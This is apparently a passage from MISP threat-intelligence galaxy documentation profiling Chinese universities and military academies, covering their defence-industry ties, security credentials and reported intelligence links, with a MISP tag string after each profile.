The tag is: misp-galaxy:china-defence-universities="People’s Public Security University of China (中国人民公安大学)"
Railway Police College (铁道警察学院)

The Railway Police College is China’s only institution of higher learning devoted to training specialists responsible for securing the Chinese railway network. In 2017, the college graduated over 1,000 personnel trained in disciplines such as surveillance studies, political security studies and safety management studies.

The tag is: `misp-galaxy:china-defence-universities="Railway Police College (铁道警察学院)"`

Renmin University (人民大学)

Renmin University is subordinate to the Ministry of Education and also supported by the Beijing Municipal Government. Its focus is in the humanities and social sciences. Although the university does not appear to have ties with the national defense industry, it was placed on the US Government’s Unverified List in April 2019, which places restrictions on US exports to the university. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: `misp-galaxy:china-defence-universities="Renmin University (人民大学)"`

Rocket Force Command College (火箭指挥学院)

The Rocket Force Command College is the PLA's premier institute devoted to training cadets and early-to-mid career officers in conventional and nuclear missile campaigns. Candidates require understanding of battlefield command, management and campaign tactics prior to entry into the college. The college then builds on this knowledge by providing specialist training for missile campaigns.

The tag is: `misp-galaxy:china-defence-universities="Rocket Force Command College (火箭指挥学院)"`
Rocket Force Research Institute (中国人民解放军火箭军研究院)

The Rocket Force Research Institute develops nuclear and conventional ballistic missiles, carrying out research on warhead, guidance and control technology. It appears to be the successor to the PLA Second Artillery Equipment Academy (火箭军装备研究院) and the Rocket Force Equipment Academy (火箭军装备研究院). The institute reportedly hosts two national-level defence laboratories. It also has a strategic cooperation agreement with Beijing Institute of Technology, which hosts two state key laboratories that study impacts and explosions.

The tag is: `misp-galaxy:china-defence-universities="Rocket Force Research Institute (中国人民解放军火箭军研究院)"

Table 678. Table References


Rocket Force Sergeant School (中国人民解放军火箭军士官学校)

The Rocket Force Officer College is an institution devoted to training military personnel for China’s tactical and strategic missile forces that was established after Xi Jinping’s military reforms in 2017. The college’s focus is on providing technical training to personnel in the PLARF’s missile systems. However, the college has also produced research on underground engineering which would be useful to hardening bases for missile strikes.

The tag: `misp-galaxy:china-defence-universities="Rocket Force Sergeant School (中国人民解放军火箭军士官学校)"

Table 679. Table References


Rocket Force University of Engineering (中国人民解放军火箭军工程大学)

RFUE is the PLA strategic missile force’s leading institution for training technical and scientific talent. Students entering the university tend to be university graduates and career members of the PLA Rocket Force. Defence research conducted by the RFUE focuses on building resilience and capabilities for conventional and nuclear missile strikes. RFUE hosts the Missile Testing and Control Virtual Simulation Experimental Teaching Center (导弹测试与控制虚拟仿真实验教学中心). The university’s key areas of research include:

The tag is: `misp-galaxy:china-defence-universities="Rocket Force University of Engineering (中国人民解放军火箭军工程大学)""
Shandong University (山东大学)

SDU is subordinate to the Ministry of Education. Since 2016, it has also been supervised by defence industry agency SASTIND as part of a program to expand universities’ involvement in defence research and training. SDU has pursued greater involvement in defence research since at least 2006, when it established a national defence research institute to coordinate relevant work across the university. Shortly afterwards, it received secret-level security credentials allowing it to participate and research and production for classified weapons and defence technology projects. In 2008, it was recognised as one of Shandong Province’s 10 outstanding defence industry units. SDU collaborates with the Chinese Academy of Engineering Physics, China’s nuclear warheads development facility, on topics including the development of crystals that are used in the study of nuclear explosions and research on fusion ignition.

The tag is: misp-galaxy:china-defence-universities="Shandong University (山东大学)"

Shandong University of Technology (山东理工大学)

SDUT specialises in engineering and carries out growing levels of defence research. In 2018, SDUT became the only university in Shandong Province jointly supervised by defence industry agency SASTIND besides Shandong University. This indicates that SDUT’s involvement in defence research and links to the defence industry will grow in coming years. SASTIND has specifically indicated its intention to build up advanced materials and advanced manufacturing technology as areas of defence research at SDUT. SDUT has carried out research on mechatronic engineering for the defence industry, and developed a non-destructive testing system for ceramic antenna covers on missiles.

The tag is: misp-galaxy:china-defence-universities="Shandong University of Technology (山东理工大学)"

Shanghai Jiao Tong University (上海交通大学)

SJTU is directly under the administration of the MOE. In 2016 it also came under the supervision of defence industry agency SASTIND as part of a ‘joint construction’ agreement between the MOE and SASTIND. The university has at least three laboratories focused on defense research relating to
materials science, ships and hydrodynamics. The defence labs have established substantial collaborative research and talent development relationships with hydrodynamics research groups at universities including MIT, Cornell, and the Danish Technical University. One of the university’s strongest departments is computer science. Its computer science program has garnered support from American tech companies such as Cisco Systems and Microsoft, which collaborated on establishing a laboratory for intelligent computing and intelligent systems at the university. In particular, the School of Information Security Engineering, has ties to the PLA through its dean and chief professor who both previously worked for the PLA. SJTU also has ties to the PLA Unit 61398, a cyber espionage unit that has been implicated in cyber attacks on the United States. SJTU is also known for its involvement in maritime research. The School of Naval Architecture, Ocean & Civil Engineering cooperates extensively with other universities from around the world as well as with many domestic industrial enterprises, such as defence conglomerate CSIC and CASC. The school is the lead unit of the High-tech Ship and Deep-Sea Development Equipment Collaborative Innovation Center (高新船与深海开发装备协同创新中心), where it has contributed to assisting the PLA Navy’s transition to offshore defense operations.

The tag is: misp-galaxy:china-defence-universities="Shanghai Jiao Tong University (上海交通大学)"

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**Shanghai University (上海大学)**

SHU is engaged in growing levels of defence research. In 2016, the Shanghai Municipal Government and defence industry agency SASTIND agreed to jointly supervise and support its participation in defence research. Shanghai University has begun building up its capability in defence research in areas such as unmanned surface vehicles, materials for missiles, and microwave technology. It holds secret-level security credentials, allowing it to participate in classified defence technology projects. Shanghai University’s Research Institute of Unmanned Surface Vehicle Engineering researches and produces unmanned surface vessels, some of which are for the China Maritime Safety Administration.

The tag is: misp-galaxy:china-defence-universities="Shanghai University (上海大学)"

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**Shenyang Aerospace University (沈阳航空航天大学)**

SAU is the only university formally under the supervision of China’s military aircraft manufacturer, AVIC. SAU engages in high levels of defence research and describes itself as a base for training talent in national defence science and technology. Serving China’s military aviation industry is what SAU refers to as its ‘glorious tradition’. Many of China’s military aircraft are designed and built in Shenyang, which is home to AVIC subsidiaries Shenyang Aircraft Design Institute and Shenyang
Aircraft Corporation. SAU and AVIC work closely together, including through a joint research institute.

The tag is: `misp-galaxy:china-defence-universities="Shenyang Aerospace University (沈阳航空航天大学)"

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**Shenyang Ligong University (沈阳理工大学)**

SYLU is a civilian university that specialises in defence research. The university's primary areas of defence research are armament science, information and communications engineering, control science, materials science and mechanical engineering. Apart from Xi’an Technological University, SYLU is the only Chinese civilian university supervised by state-owned arms manufacturers Norinco Group and China South Industries Group. In 2016, it also came under the supervision of defence industry agency SASTIND. SYLU is a member of the B8 Cooperation Innovation Alliance (B8协同发展 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in armament science—the ‘B’ in ‘B8’ stands for the Chinese word for armaments, bingqi (兵器). The university runs a weapons museum on its campus. Furthermore, SYLU is a member of the Liaoning Military-Civil Fusion Arms Industry-College Alliance (辽宁军民融合(兵工)产业校企联盟) and SYLU’s president doubles as chairman of the alliance. This indicates close ties between SYLU and China’s arms industry.

The tag is: `misp-galaxy:china-defence-universities="Shenyang Ligong University (沈阳理工大学)"

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**Shenzhen University (深圳大学)**

SZU is the primary university in China's rapidly growing technology hub, Shenzhen. The university does not appear to engage in high levels of defence research outside of its national defence laboratory on automatic target recognition. The laboratory was founded in 2001, is overseen by the PLA and SASTIND, and is headed by the university’s former president.

The tag is: `misp-galaxy:china-defence-universities="Shenzhen University (深圳大学)"

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**Shijiazhuang Tiedao University (石家庄铁道大学)**

STDU specializes in transportation science, engineering and information technology. Its predecessor
was the PLA Railway Engineering College. Since 2013, STDU has also been supervised by defence industry agency SASTIND through an arrangement designed to expand the university's involvement in defense-related research and training. STDU has secret-level security credentials, allowing it to participate in classified defense technology research. STDU is home to the National Defense Transportation Research Institute (国防交通研究所), which is the only civilian university research institute that specializes in national defense transportation research. STDU is also home to the Institute of Complex Networks and Visualisations (复杂网络与可视化研究所), which develops military-use information processing software including remote-control systems for aerospace applications.

The tag is: **misp-galaxy:china-defence-universities="Shijiazhuang Tiedao University (石家庄铁道大学)"**

### Sichuan University (四川大学)

Sichuan University (SCU) is a leading Chinese university subordinate to the Ministry of Education. In 2011 and again in 2016 SCU was the subject of joint construction agreements between the MOE and defence industry agency SASTIND designed to increase its involvement in defence research. The university hosts at least three laboratories that focus on defence research and has a close relationship with the Chinese Academy of Engineering Physics (CAEP), the PRC’s primary nuclear warheads research facility. SCU’s Institute of Atomic and Molecular Physics and CAEP jointly established the Institute of Atomic and Molecular Engineering and the Institute of High Temperature and High Pressure Physics. In 2012, SCU was added to the US BIS Entity List as an alias of CAEP, implying that it acts as a proxy for the facility. A 2011 study by American think tank Project 2049 concluded that a PLA signals intelligence unit ‘likely maintain a close, mutually supportive relationship with related organizations in Chengdu, such as Sichuan University’s Information Security and Network Attack and Defense Laboratory (信息安全及网络攻防研究室).’

The tag is: **misp-galaxy:china-defence-universities="Sichuan University (四川大学)"**

### Soochow University (苏州大学)

Soochow University has been jointly supervised by the Jiangsu Provincial Government and defence industry agency SASTIND since 2016. This arrangement is designed to expand the university's involvement in defense-related research and training. The university has five designated defence disciplines, centred around research on radiation. In particular, its School of Radiation Medicine and Protection has strong defence links, as it has become a major teaching and research base for the nuclear industry. Suzhou University is also involved in promoting military-civil fusion. The university cooperated with Changfeng Science Technology Industry Group (a subsidiary of missile manufacturer CASC) and Suzhou Xinkuan Electronic Technology Co., Ltd. to jointly establish the
South China University of Technology (华南理工大学)

SCUT is subordinate to the Ministry of Education and in 2018 was placed under a joint-construction agreement between the MOE and SASTIND. This arrangement is designed to develop the university’s involvement in defence-related research and training. SCUT also holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects. As a result of the university’s placement under joint construction and its secret-level security credentials, SCUT’s involvement in defence research is likely to grow in coming years. Since 2008, the university has hosted a defence research laboratory on materials science. The lab was initially run by the university’s president. In 2017, the university joined the Guangzhou Civil-Military Integration Industry Coalition. More recently in 2019, SCUT and iFlytek established an artificial intelligence company, Guangzhou Huanan Naokong Zhineng Keji Gongsii (广华南脑控智能科技公司).

Southeast University (东南大学)

SEU is a leading Chinese university that engages in high levels of defence research. In 2015, the university undertook RMB180m (AUD37m) of defence research projects, placing it among the Ministry of Education universities most involved in defence research. That figure has almost certainly grown since 2016, when SEU came under a ‘joint construction’ agreement between the Ministry of Education and defence industry agency SASTIND. The university has secret security credentials, enabling it to participate in secret defence projects. The university has also been linked to cyberespionage. Researchers at its School of Cyber Science and Engineering (网络空间安全学院) have been funded by the MSS, China’s civilian intelligence agency. The School of Cyber Science and Engineering has close ties to TopSec, a Chinese information security company that trains, recruits and works with PLA cyber security officers. SEU states that its defence research relies on its excellence in electronics. It has at least two laboratories that specialise in defence research on navigation technology and underwater acoustics. Both laboratories may be involved in developing technology for underwater warfare. Representatives from the PLA Navy’s Submarine Academy visited SEU in 2017. SEU has also built relationships with state-owned defence conglomerates. In 2017, the university signed a strategic cooperation agreement with missile-manufacturer China Aerospace Science and Industry Corporation. In 2018 and 2019, it signed similar agreements with
subsidiaries of China Electronics Technology Group Corporation, China’s leading manufacturer of military electronics.

The tag is: *misp-galaxy:china-defence-universities="Southeast University (东南大学)"

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## Southwest University of Science and Technology (西南科技大学)

SWUST is deeply engaged in defence research and is based in Mianyang, a city also home to China’s nuclear weapons program and many other parts of the defence industry. Since 2006, the university has been subject to several joint construction agreements between the Sichuan Provincial Government and SASTIND that are designed to increase its involvement in defence research. SWUST carries out defence-related research on nuclear waste, radiation protection and electronic information engineering. It holds secret-level security credentials, allowing it to undertake classified defence technology and weapons projects. The university's main defence laboratory carries out research on topics such as the use of microorganisms to clean nuclear waste. SWUST has worked closely with the Chinese Academy of Engineering Physics (China's nuclear warheads program), China Aerodynamics Research and Development Center (a PLA base specialising in aircraft design), and defence conglomerates since its establishment. The fact that the university hosts the province’s ‘Civil-military Integration Institute’ is a testament to its integration with the military and defence industry.

The tag is: *misp-galaxy:china-defence-universities="Southwest University of Science and Technology (西南科技大学)"

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## Space Engineering University (中国人民解放军战略支援部队航天工程大学)

SEU was established in June 2017 as an expansion of the former PLA Equipment Academy (装备学院). SEU describes itself as a ‘comprehensive university that trains talents for space command management and engineering.’ It is intended to serve as the ‘cradle of the new PLA’s space talent training.’ The SEU is subordinate to and supports the PLA Strategic Support Force’s Space Systems Department (航天系统部), which has taken over the space and potentially counterspace capabilities that were previously the purview of the former General Armaments Department and, to a lesser degree, the former General Staff Department. The SEU offers degree programs at the undergraduate, master’s, and doctoral levels, as well as programs for non-commissioned officers, across disciplines including space target surveillance, remote sensing science and technology, and aerospace information security. Its faculty include nine CMC Science and Technology Commission experts and...
twenty professors who are designated as expert defence science and technology advisors. Beyond its mission of talent cultivation, the SEU also engages in extensive research. In particular, the SEU has a total of eighteen laboratories, which include two national-level key laboratories and one military-level key laboratory.

The tag is:  

**misp-galaxy:china-defence-universities**="Space Engineering University (中国人民解放军战略支援部队航天工程大学)"

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**Special Police Academy (中国武装警察部队特种警察学院)**

SPA is made up of departments for training, political work and logistics. As such, SPA engages in little defence research and focusses its activities on training special operations paramilitary troops in command processes.

The tag is:  

**misp-galaxy:china-defence-universities**="Special Police Academy (中国武装警察部队特种警察学院)"

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**Sun Yat-sen University (中山大学)**

SYSU is a leading Chinese university subordinate to the Ministry of Education. In 2018, it came under the joint supervision of MOE and defence industry agency SASTIND. This development indicates that SYSU’s involvement in the defence industry and defence research is growing. The university has a large defence research budget. In 2018, it spent nearly RMB200 million (AUD41 million) on defence research out of its total research budget of RMB3.1 billion (AUD640 million). SYSU is linked to the Chinese military through its National Supercomputer Center in Guangzhou (国家超算广州中心), which was placed on the US Government Entity List in 2015 for its role in nuclear weapons development. The centre was jointly established with the PLA National University of Defense Technology in 2011 to host the Tianhe-2 supercomputer. The supercomputer is operated by the National University of Defense Technology and was the world’s fastest from 2013 to 2015. Aside from the supercomputer center, SYSU’s Key Laboratory of Information Science is the only known lab focused on defence research and is located within the School of Electronics and Information Technology. In 2010, the university established a State Secrets Academy (国家保密学院), serving as the third university in China to establish such an institute in partnership with China’s National Administration of State Secrets Protection (国家保密局). The Institute carries out research and training on the protection of state secrets.

The tag is:  

**misp-galaxy:china-defence-universities**="Sun Yat-sen University (中山大学)"

**Table 696. Table References**
Tianjin Polytechnic University (天津工业大学)

TJPU is known for its research in the field of textile science and engineering. It is jointly supervised by the Ministry of Education and the city of Tianjin. In 2018, defence industry agency SASTIND and the Tianjin Municipal Government signed an agreement to jointly support TJPU. The purpose of the agreement is to support the university’s development of defence disciplines, construction of defence laboratories, and training of defence scientists. Through this arrangement, SASTIND involves universities in military research projects and supports collaboration between universities and the defence industry. The university also holds secret-level security credentials that allow it to participate in classified defence technology projects. Tianjin Polytechnic University hosts one state key lab and two MOE key labs. One of the MOE key labs and the state key lab are located within the School of Material Science and Engineering. Additionally, TJPU’s School of Textile Science and Engineering has conducted R&D that has been applied to industries in aerospace, defense, transportation, civil engineering, among others. The School of Textile Science and Engineering has reportedly become a backbone of research and innovation for China’s textile industry.

The tag is: misp-galaxy:china-defence-universities="Tianjin Polytechnic University (天津工业大学)"

Table 697. Table References

Links

Tianjin University (天津大学)

TJU is under the administration of the Ministry of Education and has also been supervised by defence industry agency SASTIND since 2012. The university has second-class security credentials, allowing it to participate in classified research projects at the level of ‘secret’. It hosts two defence laboratories, working on optoelectronics and propellants. In 2015, A professor at Tianjin University was arrested by U.S. federal agents and accused of economic espionage and technology theft. He had been a professor in the School of Precision Instrument and Opto-electronics Engineering, which is home to one of the MOE labs involved in defense research. TJU is also a member of several international engineering alliances and has one National Defense Technology Innovation Team. TJU carries out research for the Ministry of State Security (MSS), China’s civilian intelligence agency. It has hosted at least one MSS researcher and its scientists have been awarded for their work for the MSS on communication and information engineering.

The tag is: misp-galaxy:china-defence-universities="Tianjin University (天津大学)"

Table 698. Table References

Links
**Tongji University (同济大学)**

Tongji University recognized for its work in architecture, civil engineering, marine geology, and transportation engineering. The university established the only state key laboratory of deep-sea geology, which plays an important role in China’s deep-sea observation and serves as a significant platform for the country’s marine strategy. The university’s involvement in marine research likely stems from its joint construction with the State Oceanic Administration (SOA). In 2010, the Ministry of Education and the State Oceanic Administration signed to jointly establish 17 universities, a collaboration aimed at enhancing the ability to cultivate marine talents in universities, develop marine science and technology, and make contributions to the development of China’s marine industry. Tongji University has secret-level security credentials and is home to one Ministry of Education laboratory dedicated to defense research. In April 2019, the university was placed on the U.S. Unverified List, which places restrictions on US exports to the university. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

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**Tsinghua University (清华大学)**

Tsinghua University is considered China’s leading university in science and technology. Often characterized as ‘China’s MIT,’ Tsinghua is highly ranked globally, while also being the alma mater of numerous Chinese leaders, including Xi Jinping. Tsinghua has been included in numerous Chinese educational initiatives, including acting as a Class A institution in the Double First-Class University Plan and with membership in China’s C9 League. As of spring 2018, Tsinghua University had 390 research institutions operating across a range of fields. Tsinghua engages in a range of military research and was awarded secret-level security credentials for classified research in 2007. In advancing military-civil fusion, Tsinghua also continues its ‘fine tradition’ of serving China’s national security and defense, actively creating new platforms and initiatives to support this strategy. Not only its dedicated defence laboratories but also a range of key laboratories and research institutions at the university have received funding from the military. Since at least 2012, Tsinghua has also been jointly supervised by defence industry agency SASTIND as part of a program to deepen its defence research and links to the defence sector. Tsinghua’s defence research covers areas such as artificial intelligence, air-to-air missiles, navigation technology, instrument science and materials science. The university trains students for China’s nuclear weapons program, military and defence industry. In 2014 it signed a strategic cooperation agreement with the Chinese Academy of Engineering Physics (CAEP)—China’s nuclear weapons program. In 2016, CAEP’s Materials Institute and Tsinghua established a joint postgraduate training base for teaching, research collaboration and equipment sharing. Approximately 200 postgraduate students at Tsinghua are sponsored by CAEP or defence industry conglomerates each year through the Chinese government’s National Defence Science and Technology Scholarship program. Scholarship recipients are required to work for their sponsoring organisation for five years after graduating. Roughly 2000 of the scholarships are awarded each year, indicating that Tsinghua students are
among the primary recipients of them. Documents published by Tsinghua indicate that CAEP planned to sponsor 40 PhD students to study nuclear technology in 2013. CAEP continues to sponsor Tsinghua postgraduates. In 2004, Tsinghua agreed to supervise doctoral students from the PLA's Second Artillery Engineering University, now known as the Rocket Force University of Engineering.

The tag is: `misp-galaxy:china-defence-universities="Tsinghua University (清华大学)"`

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### University of Electronic Science and Technology of China (电子科技大学)

UESTC was established in 1961 as one of China’s first defence industry universities. It is now subordinate to the Ministry of Education (MOE) and is also jointly supervised by defence industry agencies MIIT and SASTIND, as well as the Chinese military's leading electronics manufacturer, China Electronics Technology Group Corporation (CETC). The university is one of China’s leading universities for defence electronics research. It claims to rank among the top MOE universities in terms of the scale of its defence research. Between 2011 and 2015, its annual spending on defence research grew by 210% to RMB400 million (AUD80 million) and may account for as much as 32% of its overall research spending. 16.43% of UESTC graduates in 2017 who found employment were working in the defence sector. UESTC gained secret-level security credentials about a decade ago, probably in 2006, making it one of the first MOE universities to hold them. UESTC research has been used by state-owned manufacturers of military aircraft, missiles, and military electronics and the PLA Navy on projects such as the JF-17 fighter and the Navy's aircraft carrier program. UESTC's defence research covers areas including electronics, microwaves, terahertz technology, anti-jamming technology and signal processing, communication systems, military-use critical materials, optoelectric imaging. Between 2001 and 2005, UESTC undertook over 900 military electronics projects worth in excess of RMB500 million (AUD104 million). UESTC's research on artificial intelligence has attracted scrutiny for its human rights implications. In 2015, a professor recruited by UESTC through the Thousand Talents Plan established a company called Koala AI. The company produces artificial intelligence surveillance systems that are used in Xinjiang, where an estimated 1.5 million Uyghurs and other ethnic minorities have disappeared into concentration camps. UESTC has close relationships with the Chinese defence industry. The university operates a national laboratory on high-power radiation with the Chinese Academy of Engineering Physics, the PRC's primary nuclear warhead research complex. CETC, a state-owned defence conglomerate, partnered jointly with the MOE to develop UESTC’s capabilities. Under the arrangement, UESTC agreed to expand its collaboration with CETC, help train CETC personnel and send its best students to work at CETC. Defence industry agency SASTIND also signed agreements to supervise UESTC in 2008 and 2016.

The tag is: `misp-galaxy:china-defence-universities="University of Electronic Science and Technology of China (电子科技大学)"`

### Table 701. Table References
University of International Relations (国际关系学院)

UIR claims was established in 1949 under the direction of then Premier Zhou Enlai. In 1964 it was designated as a ‘national key university’, and this appears to be the evidence it uses to claim it is a Ministry of Education university. However, the university does not appear on the Ministry of Education’s list of subordinate universities. Individuals formerly and presently affiliated with the university have also held affiliations with the MSS or the MSS-linked think tank the China Institutes of Contemporary International Relations (中国国际关系研究院). They include Geng Huichang (耿惠昌), a former Minister of State Security (2007-2016) and vice minister of State Security (1998-2007). Prior to this he was the head of China Institutes of Contemporary International Relations from 1992 to 1998. From 1990 to 1992, he was the director of UIR’s American Research Department and from 1985-1990 he was deputy director of the American Research department. Notably, current UIR President Tao Jian is also a former CICIR vice-president and a UIR graduate. UIR gives the MSS a way to work with foreign universities and academics to shape and learn about perceptions of the PRC’s views on security. It also provides a platform for the MSS to identify talent, recruit officers and collect intelligence. The university’s Hangzhou campus, also known as the Zhejiang Second People’s Police School, may carry out more practical training of MSS officers and has been described on a local government website as ‘specialising in training special talent’. Some graduates of the Hangzhou campus have moved straight into MSS positions. The Hangzhou campus works closely with Zhejiang University on teaching and research.

The tag is: misp-galaxy:china-defence-universities="University of International Relations (国际关系学院)"

Table 702. Table References

Links


University of Science and Technology Beijing (北京科技大学)

USTC is a leading university subordinate to the MOE. The university engages in high levels of defence research and claims be among the top MOE universities for defence spending. Since 2018, it has been under a joint-construction agreement between the MOE and defence industry agency SASTIND that is designed to expand its involvement in defence research. USTB is known as the ‘cradle of steel’ for its training and research on metallurgy. The university’s defence research appears to focus on metallurgy and materials science. It hosts at least three laboratories dedicated to defence research, including two that are jointly run with state-owned defence conglomerates. The head of USTB’s Institute of Advanced Materials and Technology also heads a SASTIND-supported defence science and technology innovation team. The university holds secret-level security credentials, allowing it participate in research and production for classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="University of Science and Technology Beijing (北京科技大学)"
University of Science and Technology of China (中国科学技术大学)

The University of Science and Technology of China is among China’s most prestigious universities in science and technology. Uniquely, it was established and is supervised by the Chinese Academy of Sciences, intended to serve national objectives in science and technology. Xi Jinping personally inspected USTC in 2016, urging it to pursue “even more outstanding achievements in teaching and innovation.” It is a member of the C9 League and in the “211 Project” and “985 Project.” While providing undergraduate and graduate-level education, USTC is also highly active in research across a number of major laboratories, including several that support research that is related to national defense and the development of dual-use technologies, such as brain-inspired approaches to artificial intelligence and quantum information science. USTC has a long history of contributions to science in the service of the state, and it has recently sought to deepen its contributions to military research, including through establishing a new center for military-civil fusion. Several USTC professors, including prominently Pan Jianwei, have partnered with the defense industry to pursue military applications of their technologies.

The tag is: `misp-galaxy:china-defence-universities="University of Science and Technology of China (中国科学技术大学)"`

University of Shanghai for Science and Technology (上海理工大学)

USST describes itself as a ‘university with defence characteristics’. It has been under the joint supervision of Shanghai and defence industry agency SASTIND since 2016. It is engaged in growing levels of defence research and holds second-class weapons research and development secrecy credentials, allowing it to undertake classified projects. In 2017, its spending on defence research reached RMB13 million (AUD2.6 million). SASTIND has designated areas with the fields of optics, energy and control science as defence disciplines at USST, indicating that the university’s defence research focuses on these areas. In 2017, The university established a joint venture on terahertz radiation technology with subsidiaries of defence conglomerate Norinco Group.

The tag is: `misp-galaxy:china-defence-universities="University of Shanghai for Science and Technology (上海理工大学)"`
University of South China (南华大学)

USC specialises in nuclear engineering. It has a well-developed defence research program and has been the subject of several joint-construction agreements between the Hunan Provincial Government and defence industry agency SASTIND since 2002. These agreements are designed to ‘support USC in going a step further to display its defence characteristics based on the development needs of the defence technology industry.’ USC is also supervised by China National Nuclear Corporation, a state-owned defence nuclear engineering conglomerate. USC carries out large amounts of defence research related to nuclear engineering, as well as work on information technology, communications engineering, control engineering and electrical engineering. The university received secret level security credentials in 2008, allowing it to work on classified defence projects.

The tag is: misp-galaxy:china-defence-universities="University of South China (南华大学)"

Table 706. Table References

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Wuhan University (武汉大学)

WHU is a leading Chinese university subordinate to the Ministry of Education. The university has close ties to the military and has been subject to a joint-supervision agreement between the Ministry of Education and defence industry agency SASTIND since 2016, an arrangement designed to increase its involvement in defence research. In 2015, WHU planned to spend RMB200 million (AUD42 million) on defence research for the year and described itself as ‘a university with a strong reputation in the defence science and technology field’. WHU carries out defence research in a wide range of fields, including navigation, computer simulation, electronic information, electromagnetics, aerospace remote sensing, materials science, cyber security and explosions. The university is an important site of research for China’s Beidou satellite navigation system. Aside from being involved in defence research, there are strong indications that WHU has carried out cyber attacks for the People’s Liberation Army. One of the university’s two defence laboratories purportedly established by the Ministry of Education, the Key Laboratory of Aerospace Information Security and Trusted Computing, has been accused by unnamed US and Taiwanese officials of carrying out cyberattacks.

The tag is: misp-galaxy:china-defence-universities="Wuhan University (武汉大学)"

Table 707. Table References

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**Wuhan University of Technology (武汉理工大学)**

WHUT is subordinate to the Ministry of Education. The university originally specialised in research relating to construction, transport and automobiles. It engages in high levels of defence research and has been under a ‘joint-construction’ agreement between the Ministry of Education and defence industry agency SASTIND since 2016. It holds secret-level security credentials. The university hosts two Ministry of Education laboratories dedicated to defence research on materials science and ship technology. WHUT also works closely with the PLA Air Force on defensive engineering such as the construction of aircraft bunkers and underground shelters. Since 2001, WHUT and the Guangdong Military Region Air Force Engineering and Construction Bureau have run a joint research institute, which ‘takes advantage of [WHUT’s] State Key Laboratory of Advanced Technology for Materials Synthesis and Processing’. ‘In 2012, the PLA Air Force Logistics Department and WHUT held a signing ceremony inaugurating the “Air Force-level Military-Civil Fusion Air Defence Engineering Construction Technology Innovation Platform Cooperation Agreement” (空防工程建设科技创新平台合作). The same department in cooperation with WHUT also jointly established the Air Force Air Defence Engineering Construction Technology Innovation Platform (空防工程建设科技创新), with ‘the goal of innovating mutually beneficial technologies.’

The tag is: **misp-galaxy:china-defence-universities=“Wuhan University of Technology (武汉理工大学)”**

**Table 708. Table References**

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**Xi’an Jiaotong University (西安交通大学)**

XJJTU is subordinate to the Ministry of Education. It is also supervised by SASTIND as part of a program to develop defense research capabilities within Chinese universities. The university describes its strategy as being ‘based in Shaanxi, geared toward the needs of the nation, and serving the national defense industry.’ The university is advanced in its implementation of military-civil fusion and has established strategic partnerships with China Aerospace Science and Technology Corporation, China Aerospace Science and Industry Corporation, and the Aero Engine Corporation of China. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: **misp-galaxy:china-defence-universities=“Xi’an Jiaotong University (西安交通大学)”**

**Table 709. Table References**

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**Xi’an Technological University (西安工业大学)**

XATU is a civilian university that primarily engages in defence research. XATU describes itself as ‘having distinct defence-industrial characteristics’ and is heavily involved in weapons development. Since 2016, it has been subject to a ‘joint construction’ agreement between the Shaanxi Provincial
Government and defence industry agency SASTIND designed to deepen its defence links. The university's main areas of defence research include photoelectric imaging technology, manufacturing technology, materials science, detection and measurement technology and weapons systems. It holds secret-level security credentials. XATU is a member of the B8 Cooperation Innovation Alliance (B8协同发展联盟 or 中國兵器協同創新聯盟), a group of eight Chinese research institutions that specialize in weapons science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器). Apart from Shenyang Ligong University, XATU is the only Chinese civilian university known to be supervised by state-owned arms manufacturers China North Industries Group (Norinco Group) and China South Industries Group.

The tag is: *misp-galaxy:china-defence-universities="Xi’an Technological University (西安工业大学)"*

### Xi’an University of Posts and Telecommunications (西安邮电大学)

XUPT is a leading Chinese university supervised by the Shaanxi Provincial Government and the Department of Information Technology. The university was established in 1959 as an institution focused on communications and information technology. XUPT retains a focus on these discipline to this day. XUPT’s faculties include college focusing on artificial intelligence, automation, cyber security and electrical engineering. XUPT maintains close links to China’s Ministry of Public Security (MPS). The university has signed agreements and established joint laboratories with the MPS’s local counterparts. In November 2013, XUPT partnered with the Shaanxi Municipal Government’s public security ministry to establish the MPS Key Laboratory of Electronic Information Application Technology for Scene Investigation (公安部电子信息现场勘验应用技术重点实验室). This was the first such joint laboratory that the MPS established with a university in any of China’s five north-western provinces. XUPT partnered with Xi’an’s Yanta District Public Security Bureau branch in November 2018, establishing the ‘Joint Laboratory for Smart Public Security Information Analysis and Applications’ (公安信息智能分析及应用联合实验室). The joint laboratory develops applications of artificial intelligence for analysing criminal information.

The tag is: *misp-galaxy:china-defence-universities="Xi’an University of Posts and Telecommunications (西安邮电大学)"*

### Xiamen University (厦门大学)

XMU is one of China’s leading universities, but it does not appear to engage in high levels of defence research. However, in 2018 it came under a joint supervision agreement between the Ministry of
Education, the Fujian Provincial Government and defence industry agency SASTIND that indicates XMU will expand its involvement in defence research. The arrangement is designed to ‘upgraded the university’s ability to innovate defence science and technology and actively integrate itself with the development of military-civil fusion.’ In 2017, XMU allegedly conspired with Huawei to steal trade secrets from CNEX Labs Inc., an American semiconductor startup. CNEX claims that Huawei and XMU engaged in a multiyear conspiracy to steal the company’s solid-state drive computer storage technology. The university appears to be involved in the development of military-use heavy-duty coatings. In 2017, XMU, Fujian Normal University, Fujian Liheng Paint Co. Ltd. (福建立恒漆料有限公司) and People’s Liberation Army Unit 63983 jointly established the Haixi Liheng New Materials Research Institute (海西立恒新材料研究院). Fujian Liheng Paint specialises in heavy-duty coatings for warships and holds confidential-level security credentials, allowing it to participate in classified defence projects.

The tag is: `misp-galaxy:china-defence-universities="Xiamen University (厦门大学)"

Table 712. Table References

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**Xiangtan University (湘潭大学)**

XTU is a university in Chairman Mao Zedong’s hometown that has substantially expanded its participation in defence research in recent years. It has been subject to two ‘joint construction’ agreements between the Hunan Provincial Government and defence industry agency SASTIND that are designed to help the university ‘draw out its national defence characteristics’. In the university’s own words, its ‘military-civil fusion characteristics are becoming clearer with each day’, and it increased its spending on military-related projects by 60% from 2017 to 2018, spending over RMB31 million (AUD6 million) in 2018. XTU’s defence research covers areas including materials science, energy, measurement technology and electromagnetic waves. The university has developed partnerships with a major PLA nuclear technology research institution, Northwest Institute of Nuclear Technology, and several defence companies, including subsidiaries of arms manufacturer Norinco Group and defence aviation conglomerate Aero Engine Corporation of China. XTU holds secret-level security credentials, allowing it to participate in classified defence technology projects.

